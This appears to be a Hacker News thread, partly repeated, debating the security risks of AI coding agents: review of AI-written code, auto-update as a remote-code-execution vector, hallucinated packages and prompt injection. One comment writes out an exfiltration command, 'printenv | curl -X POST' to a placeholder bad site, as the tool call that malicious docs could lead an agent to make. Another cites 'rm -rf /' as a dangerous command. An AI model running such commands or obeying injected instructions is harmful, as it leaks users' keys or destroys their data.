I have recently written security-sensitive code using Opus 4. I of course reviewed every line and made lots of both manual and prompt-based revisions.
Cloudflare apparently did something similar recently.
It is more than possible to write secure code with AI, just as it is more than possible to write secure code with inexperienced junior devs.
As for the RCE vector; Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.
Separately from AI, most people deploy containers based on tagged version names, not cryptographic hashes. This is trivially exploitable by the container registry.
> I have recently written security-sensitive code using Opus 4. I of course reviewed every line and made lots of both manual and prompt-based revisions.
> Cloudflare apparently did something similar recently.
Sure, LLMs don't magically remove your ability to audit code. But the way they're currently being used, do they make the average dev more or less likely to introduce vulnerabilities?
By the way, a cursory look [0] revealed a number of security issues with that Cloudflare OAuth library. None directly exploitable, but not something you want in your most security-critical code either.
The humans missed that as well though, the security issues you point to. I don't think that's on the AI, ultimately, we humans are accountable to the work.
> Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.
Isn't that the same for Chrome, VSCode, and any upstream-managed (as opposed to distro/os managed) package channel with auto updates?
It's a bad default, but pretty much standard practice, and done in the name of security.
Are you unaware of the concept of a junior engineer working in a company? You realize that not all human code is written by someone with domain expertise, right?
Are you aware that your wording here is implying that you are describing a unique issue with AI code that is not present in human code?
>What would have happened if someone without your domain expertise wasn't reviewing every line and making the changes you mentioned?
So, we're talking about two variables, so four states: human-reviewed, human-not-reviewed, ai-reviewed, ai-not-reviewed.
[non ai]
*human-reviewed*: Humans write code, sometimes humans make mistakes, so we have other humans review the code for things like critical security issues
*human-not-reviewed*: Maybe this is a project with a solo developer and automated testing, but otherwise this seems like a pretty bad idea, right? This is the classic version of "YOLO to production", right?
[with ai]
*ai-reviewed*: AI generates code, sometimes AI hallucinates or gets things very wrong or over-engineers things, so we have humans review all the code for things like critical security issues
*ai-not-reviewed*: AI generates code, YOLO to prod, no human reads it - obviously this is terrible and barely works even for hobby projects with a solo developer and no stakes involved
I'm wondering if the disconnect here is that actual professional programmers are just implicitly talking about going from [human-reviewed] to [ai-reviewed], assuming nobody in their right mind would just _skip code reviews_. The median professional software team would never build software without code reviews, imo.
But are you thinking about this as going from [human-reviewed] straight to [ai-not-reviewed]? Or are you thinking about [human-not-reviewed] code for some reason? I guess it's not clear why you immediately latch onto the problems with [ai-not-reviewed] and seem to refuse to acknowledge the validity of the state [ai-reviewed] as being something that's possible?
It's just really unclear why you are jumping straight to concerns like this without any nuance for how the existing industry works regarding similar problems before we used AI at all.
Is the argument that developers who are less experience/in a hurry, will just accept whatever they're handed? In that case, this would be as true for random people submitting malicious PRs that someone accepts without reading, even without an LLM involved at all? Seems like an odd thing to call a "security nightmare".
One thing relying on coding agents does is it changes the nature of the work from typing-heavy (unless you count prompting) to code-review-heavy.
Cognitively, these are fairly distinct tasks. When creating code, we imagine architecture, tech solutions, specific ways of implementing, etc., pre-task. When reviewing code, we're given all these.
Sure, some of that thinking would go into prompting, but not to such a detail as when coding.
What follows is that it's easier to make a vulnerability pass through. More so, given that we're potentially exposed to more of them. After all, no one coding manually would consciously add vulnerability to their code base. Ultimately, all such cases are by omission.
A compromised coding agent would try that. So, we have to change the lenses from "vulnerability by omission only" to "all sorts of malicious active changes" too.
An entirely separate discussion is who reviews the code and what security knowledge they have. It's easy to dismiss the concern once a developer has been dealing with security for years. But these are not the only developers who use coding agents.
Consider the following scenario: You're a developer in charge of implementing a new service. This service interfaces with one of your internal DBs containing valuable customer data. You decide to use a coding agent to make things go a little bit faster, after all your requests are not very complicated and it's bound to be fairly well known.
The agent decides to import a bunch of different packages. One of them is a utility package hallucinated by the LLM. Just one line being imported erroneously, and now someone can easily exfiltrate data from your internal DB and make it very expensive. And it all looks correct upfront.
You know what the nice thing is about actually writing code? We make inferences and reasoning for what we need to do. We make educated judgments about whether or not we need to use a utility package for what we're doing, and in the process of using said utility can deduce how it functions and why. We can verify that it's a valid, safe tool to use in production environments. And this reduces the total attack surface immensely; even if some things can slip through the odds of it occurring are drastically reduced.
If we increase the velocity of changes to a codebase, even if those changes are being reviewed, it stands to reason that the rate of issues will increase due to fatigue on the part of the reviewer.
Consider business pressures as well. If LLMs speed up coding 2x (generously), will management accept losing that because of increased scrutiny?
> will management accept losing that because of increased scrutiny
If they don't then they're stupid
This has been the core of my argument against LLM tools for coding all along. Yes they might get you to a working piece of software faster, but if you are doing actual due diligence reviewing the code they produce then you likely aren't saving time
The only way they save you time is if you are careless and not doing your due diligence to verify their outputs
> Is the argument that developers who are less experience/in a hurry,
The CTO of my company has pushed multiple AI written PRs that had obvious breaks/edge cases, even after chastising other people for having done the same.
It's not an experience issue. It's a complacency issue. It's a testing issue. It's the price companies pay to get products out the door as quickly as possible.
Stories about CTOs heavily overrelying on their long-outdated coding experience are plenty. If that's an ego thing ("I can still do that and show them that I can"), they're going to do that with little care about the consequences.
At that level, it's the combination of all the power and not that much tech expertise anymore. A vulnerable place.
A lot of famous hacks targeted humans as a primary weak point (gullibility, incompetence, naivety, greed, curiosity, take your pick), and technology only as a secondary follow-up.
An example: Someone had to pick up that "dropped" pendrive in a cantina and plug it into their computer in a 100% isolated site to enable Stuxnet.
Were I a black hat hacker, targeting CTOs' egos would be high on my priority list.
This. Our company rolled out 'internal' AI ( in quotes, because its a wrapper on chatgpt with some mild regulatory checks on output ). We were officially asked to use it for tasks wherever possible. And during training sessions, my question about privacy ( as users clearly are not following basic hygiene for attached file ) was not just dismissed, but ignored.
I am not a luddite. I see great potential in this tech, but holy mackarel will there be price to pay.
I was also confused. In our organization all PR’s must always be reviewed by a knowledgeable human. It does not matter if it was all LLM generated or written by a person.
If insecure code makes it past that then there are bigger issues - why did no one catch this, is the team understanding the tech stack well enough, and did security scanning / tooling fall short, and if so how can that be improved?
The attack isn’t bad code. It could be malicious docs that tell the LLM to make a tool call to printenv | curl -X POST https://badsite -d -
and steal your keys.
Aside from noting that reviews are not perfect and increased attacks is a risk anyway - the other major risk is running code on your dev machine. You may think to review this more for an unknown pr than an llm suggestion.
I think that you're under the impression that most code reviews in most of the companies out there are more than people just hitting a button in case tests pass.
More and more companies are focusing on costs and timelines over anything else. That means if they are convinced that AI can move things faster and be cost efficient they are going to use more AI and revise cost and time downwards.
AI can write plausible code without stopping. So, not only you get sheer volume of PRs going up at the same time you might be asked to do things "faster" because you can always use AI. I am sure some CTOs might even say - why not use AI to review AI code to make it faster?
Not to mention previously the random people submitting malicious PRs needed to have some experience. But now every script kiddie can get LLMs to out the malicious PRs without knowledge and scale. How is that not a "security nightmare"?
I’ve seen LLMs rolled out in several organizations now and have noticed a few patterns. The big one is that we have less experienced people reviewing code an LLM generated for them. They don’t have the experience to pick out those solutions that are correct 98% of the time, but not now.
When management wants to see dollars, extra reviews are an easy place to cut. They don’t have the experience to understand what they’re doing because this has never happened before.
Meanwhile the technical people complain but not in a way that non technical people can understand. So you create data points that are not accessible to decision makers and there you go, software gets bad for a little while.
Agents execute code locally and can be very enthusiastic. All it takes is bad access control and a --prod flag to wipe a production DB.
The nature of code reviews has changed too. Up until recently I could expect the PR to be mostly understood by the author. Now the code is littered with odd patterns, making it almost adversarial.
> I could expect the PR to be mostly understood by the author
i refuse to review PRs that are not 100% understood by the author. it is incredibly disrespectful to unload a bunch of LLM slop onto your peers to review.
if LLMs saved you time, it cannot be at the expense of my time.
This is the common refrain from the anti-AI crowd, they start by talking about an entire class of problems that already exist in humans-only software engineering, without any context or caveats. And then, when someone points out these problems exist with humans too, they move the goalposts and make it about the "volume" of code and how AI is taking us across some threshold where everything will fall apart.
The telling thing is they never mention this "threshold" in the first place, it's only a response to being called on the bullshit.
Most of these attacks succeed because app developers either don’t trust role boundaries or don’t understand them. They assume the model can’t reliably separate trusted instructions (system/developer rules) from untrusted ones (user or retrieved data), so they flippantly pump arbitrary context into the system or developer role.
But alignment work has steadily improved role adherence; a tonne of RLHF work has gone into making sure roles are respected, like kernel vs. user space.
If role separation were treated seriously -- and seen as a vital and winnable benchmark (thus motivate AI labs to make it even tighter) many prompt injection vectors would collapse...
I don't know why these articles don't communicate this as a kind of central pillar.
Fwiw I wrote a while back about the “ROLP” — Role of Least Privilege — as a way to think about this, but the idea doesn't invigorate the senses I guess. So, even with better role adherence in newer models, entrenched developer patterns keep the door open. If they cared tho, the attack vectors would collapse.
> If role separation were treated seriously -- and seen as a vital and winnable benchmark, many prompt injection vectors would collapse...
I think it will get harder and harder to do prompt injection over time as techniques to seperate user from system input mature and as models are trained on this strategy.
That being said, prompt injection attacks will also mature, and I don't think that the architecture of an LLM will allow us to eliminate the category of attack. All that we can do is mitigate
Is there a market for apps that use local LLMs? I don't know of many people who make their purchasing decisions based on security, but I do know lawyers are one subset that do.
Using a local LLM isn't a surefire solution unless you also restrict the app's permissions, but it's got to be better than using chatgpt.com. The question is: how much better?
1. Organizations that care about controlling their data. Pretty much the same ones that were reluctant to embrace the cloud and kept their own server rooms.
An additional flavor to that: even if my professional AI agent license guarantees that my data won't be used to train generic models, etc., when a US court would make OpenAI reveal your data, they will, no matter where it is physically stored. That's kinda a loophole in law-making, as e.g., the EU increasingly requires data to be stored locally.
However, if one really wants control over the data, they might prefer to run everything in a local setup. Which is going to be way more complicated and expensive.
2. Small Language Models (SLMs). LLMs are generic. That's their whole point. No LLM-based solution needs all LLM's capabilities. And yet training and using the model, because of its sheer size, is expensive.
In the long run, it may be more viable to deploy and train one's own, much smaller model operating only on very specific training data. The tradeoff here is that you get a cheaper in use and more specialized tool, at the cost of up-front development and no easy way of upgrading a model when a new wave of LLMs is deployed.
Without a doubt. Companies like Mistral and Cohere (probably others too) will set up local LLMs for your organisation, in fact it's basically Cohere's main business model.
I think the short answer is that there is not one yet, but similar how there is a level of movement behind lan by people that want and can do that, we may eventually see something similar for non-technical users. At the end of the day, security is not sexy, but LLM input/output is a treasure throve if usable information..
I am building something for myself now and local is first consideration, because, as most of us here, likely see the direction publicly facing LLMs are going. FWIW, it kinda sucks, because I started to really enjoy my sessions with 4o
It'll get better over time. Or, at least, it should.
The biggest concern to me is that most public-facing LLM integrations follow product roadmaps that often focus in shipping more capable, more usable versions of the tool, instead of limiting the product scope based on the perceived maturity of the underlying technology.
There's a worrying amount of LLM-based services and agents in development by engineering teams that haven't still considered the massive threat surface they're exposing, mainly because a lot of them aren't even aware of how LLM security/safety testing even looks like.
Until there's a paradigm shift and we get data and instructions in different bands, I don't see how it can get better over time.
It's like we've decided to build the foundation of the next ten years of technology in unescaped PHP. There are ways to make it work, but it's not the easiest path, and since the whole purpose of the AI initiative seems to be to promote developer laziness, I think there are bigger fuck-ups yet to come.
Why do you think this? the general state of security has gotten significantly worse over time. More attacks succeed, more attacks happen, ransoms are bigger, damage is bigger.
The historical evidence should give us zero confidence that new tech will get more secure.
From an uncertainty point of view, AI security is an _unknown unknown_, or a non-consideration to most product engineering teams. Everyone is rushing to roll the AI features out, as they fear missing out and start running behind any potential AI-native solutions from competitors. This is a hype phase, and it's a matter of time that it ends.
Best case scenario? the hype train runs out of fuel and those companies will start allocating some resources to improving robustness in AI integrations. What else could happen? AI-targeted attacks create such profound consequences and damage to the market that everyone will stop pushing out of (rational) fear of running the same fate.
Either way, AI security awareness will eventually increase.
> the general state of security has gotten significantly worse over time. More attacks succeed, more attacks happen, ransoms are bigger, damage is bigger
Yeah, that's right. And there's also more online businesses, services, users each year. It's just not that easy to state that things are going for the better or worse unless we (both of us) put the effort to properly contextualize the circumstances and statistically reason through it.
I’ve noticed a strong negative streak in the security community around LLMs. Lots of comments about how they’ll just generate more vulnerabilities, “junk code”, etc.
It seems very short sighted.
I think of it more like self driving cars. I expect the error rate to quickly become lower than humans.
Maybe in a couple of years we’ll consider it irresponsible not to write security and safety critical code with frontier LLMs.
I've been watching a twitch streamer vibe-code a game.
Very quickly he went straight to, "Fuck it, the LLM can execute anything, anywhere, anytime, full YOLO".
Part of that is his risk-appetite, but it's also partly because anything else is just really furstrating.
Someone who doesn't themselves code isn't going to understand what they're being asked to allow or deny anyway.
To the pure vibe-coder, who doesn't just not read the code, they couldn't read the code if they tried, there's no difference between "Can I execute grep -e foo */*.ts" and "Can I execute rm -rf /".
Both are meaningless to them. How do you communicate real risk? Asking vibe-coders to understand the commands isn't going to cut it.
So people just full allow all and pray.
That's a security nightmare, it's back to a default-allow permissive environment that we haven't really seen in mass-use, general purpose internet connected devices since windows 98.
The wider PC industry has got very good at UX to the point where most people don't need to worry themselves about how their computer works at all and still successfully hide most of the security trappings and keep it secure.
Meanwhile the AI/LLM side is so rough it basically forces the layperson to open a huge hole they don't understand to make it work.
I know exactly the streamer you're referring to and this is the first time I've seen an overlap between these two worlds! I bet there are quite a few of us. Anyway, agreed on all accounts, watching someone like him has been really eye opening on how some people use these tools ... and it's not pretty.
Yeah, it does sound a lot like self-driving cars. Everyone talks about how they're amazing and will do everything for you but you actually have to constantly hold their hand because they aren't as capable as they're made out to be
You're talking about a theoretical problem in the future, while I assure you vibe coding and agent based coding is causing major issues today.
Today, LLMs make development faster, not better.
And I'd be willing to bet a lot of money they won't be significantly better than a competent human in the next decade, let alone the next couple years. See self-driving cars as an example that supports my position, not yours.
Does it matter though? Programming was already terrible. There are a few companies doing good things, the rest made garbage already for the past decades. No one cares (well; consumers don't care; companies just have insurance when it happens so they don't really care either; it's just a necessary line item) about their data being exposed etc as long as things are cheap cheap. People daily work with systems that are terrible in every way and then they get hacked (for ransom or not). Now we can just make things cheaper/faster and people will like it. Even at the current level software will be vastly easier and faster to make; sure it will suck, but I'm not sure anyone outside HN cares in any way shape or form (I know our clients don't; they are shipping garbage faster than ever and they see our service as a necessary business expense IF something breaks/messes up). Which means that it won't matter if LLMs get better; it matters that they get a lot cheaper so we can just run massive amounts of them on every device committing code 24/7 and that we keep up our tooling to find possible minefields faster and bandaid them until the next issue pops up.
> Today, LLMs make development faster, not better.
You don't have to use them this way. It's just extremely tempting and addictive.
You can choose to talk to them about code rather than features, using them to develop better code at a normal speed instead of worse code faster. But that's hard work.
What metric would you measure to determine whether a fully AI-based flow is better than a competent human engineer? And how much would you like to bet?
Analogous to the way I think of self-driving cars is the way I think of fusion: perpetually a few years away from a 'real' breakthrough.
There is currently no reason to believe that LLMs cannot acquire the ability to write secure code in the most prevalent use cases. However, this is contingent upon the availability of appropriate tooling, likely a Rust-like compiler. Furthermore, there's no reason to think that LLMs will become useful tools for validating the security of applications at either the model or implementation level—though they can be useful for detecting quick wins.
Let's maybe cross that bridge when (more important, if!) we come to it then? We have no idea how LLMs are gonna evolve, but clearly now they are very much not ready for the job.
For now we train LLMs on next token prediction and Fill-in-the-middle for code. This exactly reflects in the experience of using them in that over time they produce more and more garbage.
It's optimistic but maybe once we start training them on "remove the middle" instead it could help make code better.
There are plenty of security people on the other side of this issue; they're just not making news, because the way you make news in security is by announcing vulnerabilities. By way of example, last I checked, Dave Aitel was at OpenAI.
> Refrain from using LLMs in high-risk or safety-critical scenarios.
> Restrict the execution, permissions, and levels of access, such as what files a given system could read and execute, for example.
> Trap inputs and outputs to the system, looking for potential attacks or leakage of sensitive data out of the system.
this, this, this, a thousand billion times this.
this isn’t new advice either. it’s been around for circa ten years at this point (possibly longer).
Deleted Comment
Cloudflare apparently did something similar recently.
It is more than possible to write secure code with AI, just as it is more than possible to write secure code with inexperienced junior devs.
As for the RCE vector; Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.
Separately from AI, most people deploy containers based on tagged version names, not cryptographic hashes. This is trivially exploitable by the container registry.
We have learned nothing from Solarwinds.
> Cloudflare apparently did something similar recently.
Sure, LLMs don't magically remove your ability to audit code. But the way they're currently being used, do they make the average dev more or less likely to introduce vulnerabilities?
By the way, a cursory look [0] revealed a number of security issues with that Cloudflare OAuth library. None directly exploitable, but not something you want in your most security-critical code either.
[0] https://neilmadden.blog/2025/06/06/a-look-at-cloudflares-ai-...
Isn't that the same for Chrome, VSCode, and any upstream-managed (as opposed to distro/os managed) package channel with auto updates?
It's a bad default, but pretty much standard practice, and done in the name of security.
What would have happened if someone without your domain expertise wasn't reviewing every line and making the changes you mentioned?
People aren't concerned about you using agents, they're concerned about the second case I described.
Are you aware that your wording here is implying that you are describing a unique issue with AI code that is not present in human code?
>What would have happened if someone without your domain expertise wasn't reviewing every line and making the changes you mentioned?
So, we're talking about two variables, so four states: human-reviewed, human-not-reviewed, ai-reviewed, ai-not-reviewed.
[non ai]
*human-reviewed*: Humans write code, sometimes humans make mistakes, so we have other humans review the code for things like critical security issues
*human-not-reviewed*: Maybe this is a project with a solo developer and automated testing, but otherwise this seems like a pretty bad idea, right? This is the classic version of "YOLO to production", right?
[with ai]
*ai-reviewed*: AI generates code, sometimes AI hallucinates or gets things very wrong or over-engineers things, so we have humans review all the code for things like critical security issues
*ai-not-reviewed*: AI generates code, YOLO to prod, no human reads it - obviously this is terrible and barely works even for hobby projects with a solo developer and no stakes involved
I'm wondering if the disconnect here is that actual professional programmers are just implicitly talking about going from [human-reviewed] to [ai-reviewed], assuming nobody in their right mind would just _skip code reviews_. The median professional software team would never build software without code reviews, imo.
But are you thinking about this as going from [human-reviewed] straight to [ai-not-reviewed]? Or are you thinking about [human-not-reviewed] code for some reason? I guess it's not clear why you immediately latch onto the problems with [ai-not-reviewed] and seem to refuse to acknowledge the validity of the state [ai-reviewed] as being something that's possible?
It's just really unclear why you are jumping straight to concerns like this without any nuance for how the existing industry works regarding similar problems before we used AI at all.
Is the argument that developers who are less experience/in a hurry, will just accept whatever they're handed? In that case, this would be as true for random people submitting malicious PRs that someone accepts without reading, even without an LLM involved at all? Seems like an odd thing to call a "security nightmare".
Cognitively, these are fairly distinct tasks. When creating code, we imagine architecture, tech solutions, specific ways of implementing, etc., pre-task. When reviewing code, we're given all these.
Sure, some of that thinking would go into prompting, but not to such a detail as when coding.
What follows is that it's easier to make a vulnerability pass through. More so, given that we're potentially exposed to more of them. After all, no one coding manually would consciously add vulnerability to their code base. Ultimately, all such cases are by omission.
A compromised coding agent would try that. So, we have to change the lenses from "vulnerability by omission only" to "all sorts of malicious active changes" too.
An entirely separate discussion is who reviews the code and what security knowledge they have. It's easy to dismiss the concern once a developer has been dealing with security for years. But these are not the only developers who use coding agents.
The agent decides to import a bunch of different packages. One of them is a utility package hallucinated by the LLM. Just one line being imported erroneously, and now someone can easily exfiltrate data from your internal DB and make it very expensive. And it all looks correct upfront.
You know what the nice thing is about actually writing code? We make inferences and reasoning for what we need to do. We make educated judgments about whether or not we need to use a utility package for what we're doing, and in the process of using said utility can deduce how it functions and why. We can verify that it's a valid, safe tool to use in production environments. And this reduces the total attack surface immensely; even if some things can slip through the odds of it occurring are drastically reduced.
Consider business pressures as well. If LLMs speed up coding 2x (generously), will management accept losing that because of increased scrutiny?
If they don't then they're stupid
This has been the core of my argument against LLM tools for coding all along. Yes they might get you to a working piece of software faster, but if you are doing actual due diligence reviewing the code they produce then you likely aren't saving time
The only way they save you time is if you are careless and not doing your due diligence to verify their outputs
The CTO of my company has pushed multiple AI written PRs that had obvious breaks/edge cases, even after chastising other people for having done the same.
It's not an experience issue. It's a complacency issue. It's a testing issue. It's the price companies pay to get products out the door as quickly as possible.
At that level, it's the combination of all the power and not that much tech expertise anymore. A vulnerable place.
A lot of famous hacks targeted humans as a primary weak point (gullibility, incompetence, naivety, greed, curiosity, take your pick), and technology only as a secondary follow-up.
An example: Someone had to pick up that "dropped" pendrive in a cantina and plug it into their computer in a 100% isolated site to enable Stuxnet.
Were I a black hat hacker, targeting CTOs' egos would be high on my priority list.
I am not a luddite. I see great potential in this tech, but holy mackarel will there be price to pay.
If insecure code makes it past that then there are bigger issues - why did no one catch this, is the team understanding the tech stack well enough, and did security scanning / tooling fall short, and if so how can that be improved?
AI can write plausible code without stopping. So, not only you get sheer volume of PRs going up at the same time you might be asked to do things "faster" because you can always use AI. I am sure some CTOs might even say - why not use AI to review AI code to make it faster?
Not to mention previously the random people submitting malicious PRs needed to have some experience. But now every script kiddie can get LLMs to out the malicious PRs without knowledge and scale. How is that not a "security nightmare"?
When management wants to see dollars, extra reviews are an easy place to cut. They don’t have the experience to understand what they’re doing because this has never happened before.
Meanwhile the technical people complain but not in a way that non technical people can understand. So you create data points that are not accessible to decision makers and there you go, software gets bad for a little while.
It's been going on since Stack Exchange copypasta, and even before that in other forms. Nothing new under the sun.
The nature of code reviews has changed too. Up until recently I could expect the PR to be mostly understood by the author. Now the code is littered with odd patterns, making it almost adversarial.
Both can be minimised in a solid culture.
i refuse to review PRs that are not 100% understood by the author. it is incredibly disrespectful to unload a bunch of LLM slop onto your peers to review.
if LLMs saved you time, it cannot be at the expense of my time.
Deleted Comment
Deleted Comment
The telling thing is they never mention this "threshold" in the first place, it's only a response to being called on the bullshit.
Increasing the quantity of something that is already an issue without automation involved will cause more issues.
That's not moving the goalposts, it's pointing out something that should be obvious to someone with domain experience.
But alignment work has steadily improved role adherence; a tonne of RLHF work has gone into making sure roles are respected, like kernel vs. user space.
If role separation were treated seriously -- and seen as a vital and winnable benchmark (thus motivate AI labs to make it even tighter) many prompt injection vectors would collapse...
I don't know why these articles don't communicate this as a kind of central pillar.
Fwiw I wrote a while back about the “ROLP” — Role of Least Privilege — as a way to think about this, but the idea doesn't invigorate the senses I guess. So, even with better role adherence in newer models, entrenched developer patterns keep the door open. If they cared tho, the attack vectors would collapse.
No current model can reliably do this.
I think it will get harder and harder to do prompt injection over time as techniques to seperate user from system input mature and as models are trained on this strategy.
That being said, prompt injection attacks will also mature, and I don't think that the architecture of an LLM will allow us to eliminate the category of attack. All that we can do is mitigate
Using a local LLM isn't a surefire solution unless you also restrict the app's permissions, but it's got to be better than using chatgpt.com. The question is: how much better?
An additional flavor to that: even if my professional AI agent license guarantees that my data won't be used to train generic models, etc., when a US court would make OpenAI reveal your data, they will, no matter where it is physically stored. That's kinda a loophole in law-making, as e.g., the EU increasingly requires data to be stored locally.
However, if one really wants control over the data, they might prefer to run everything in a local setup. Which is going to be way more complicated and expensive.
2. Small Language Models (SLMs). LLMs are generic. That's their whole point. No LLM-based solution needs all LLM's capabilities. And yet training and using the model, because of its sheer size, is expensive.
In the long run, it may be more viable to deploy and train one's own, much smaller model operating only on very specific training data. The tradeoff here is that you get a cheaper in use and more specialized tool, at the cost of up-front development and no easy way of upgrading a model when a new wave of LLMs is deployed.
Without a doubt. Companies like Mistral and Cohere (probably others too) will set up local LLMs for your organisation, in fact it's basically Cohere's main business model.
I am building something for myself now and local is first consideration, because, as most of us here, likely see the direction publicly facing LLMs are going. FWIW, it kinda sucks, because I started to really enjoy my sessions with 4o
The biggest concern to me is that most public-facing LLM integrations follow product roadmaps that often focus in shipping more capable, more usable versions of the tool, instead of limiting the product scope based on the perceived maturity of the underlying technology.
There's a worrying amount of LLM-based services and agents in development by engineering teams that haven't still considered the massive threat surface they're exposing, mainly because a lot of them aren't even aware of how LLM security/safety testing even looks like.
It's like we've decided to build the foundation of the next ten years of technology in unescaped PHP. There are ways to make it work, but it's not the easiest path, and since the whole purpose of the AI initiative seems to be to promote developer laziness, I think there are bigger fuck-ups yet to come.
The historical evidence should give us zero confidence that new tech will get more secure.
From an uncertainty point of view, AI security is an _unknown unknown_, or a non-consideration to most product engineering teams. Everyone is rushing to roll the AI features out, as they fear missing out and start running behind any potential AI-native solutions from competitors. This is a hype phase, and it's a matter of time that it ends.
Best case scenario? the hype train runs out of fuel and those companies will start allocating some resources to improving robustness in AI integrations. What else could happen? AI-targeted attacks create such profound consequences and damage to the market that everyone will stop pushing out of (rational) fear of running the same fate.
Either way, AI security awareness will eventually increase.
> the general state of security has gotten significantly worse over time. More attacks succeed, more attacks happen, ransoms are bigger, damage is bigger
Yeah, that's right. And there's also more online businesses, services, users each year. It's just not that easy to state that things are going for the better or worse unless we (both of us) put the effort to properly contextualize the circumstances and statistically reason through it.
It seems very short sighted.
I think of it more like self driving cars. I expect the error rate to quickly become lower than humans.
Maybe in a couple of years we’ll consider it irresponsible not to write security and safety critical code with frontier LLMs.
Very quickly he went straight to, "Fuck it, the LLM can execute anything, anywhere, anytime, full YOLO".
Part of that is his risk-appetite, but it's also partly because anything else is just really furstrating.
Someone who doesn't themselves code isn't going to understand what they're being asked to allow or deny anyway.
To the pure vibe-coder, who doesn't just not read the code, they couldn't read the code if they tried, there's no difference between "Can I execute grep -e foo */*.ts" and "Can I execute rm -rf /".
Both are meaningless to them. How do you communicate real risk? Asking vibe-coders to understand the commands isn't going to cut it.
So people just full allow all and pray.
That's a security nightmare, it's back to a default-allow permissive environment that we haven't really seen in mass-use, general purpose internet connected devices since windows 98.
The wider PC industry has got very good at UX to the point where most people don't need to worry themselves about how their computer works at all and still successfully hide most of the security trappings and keep it secure.
Meanwhile the AI/LLM side is so rough it basically forces the layperson to open a huge hole they don't understand to make it work.
Today, LLMs make development faster, not better.
And I'd be willing to bet a lot of money they won't be significantly better than a competent human in the next decade, let alone the next couple years. See self-driving cars as an example that supports my position, not yours.
You don't have to use them this way. It's just extremely tempting and addictive.
You can choose to talk to them about code rather than features, using them to develop better code at a normal speed instead of worse code faster. But that's hard work.
Analogous to the way I think of self-driving cars is the way I think of fusion: perpetually a few years away from a 'real' breakthrough.
There is currently no reason to believe that LLMs cannot acquire the ability to write secure code in the most prevalent use cases. However, this is contingent upon the availability of appropriate tooling, likely a Rust-like compiler. Furthermore, there's no reason to think that LLMs will become useful tools for validating the security of applications at either the model or implementation level—though they can be useful for detecting quick wins.
It's optimistic but maybe once we start training them on "remove the middle" instead it could help make code better.
I might also be hyper sensitive to the cynicism. It tends to bug me more than it probably should.
Dead Comment
Self driving cars maybe be better than the average driver but worse than the top drivers.
For security code it’s the same.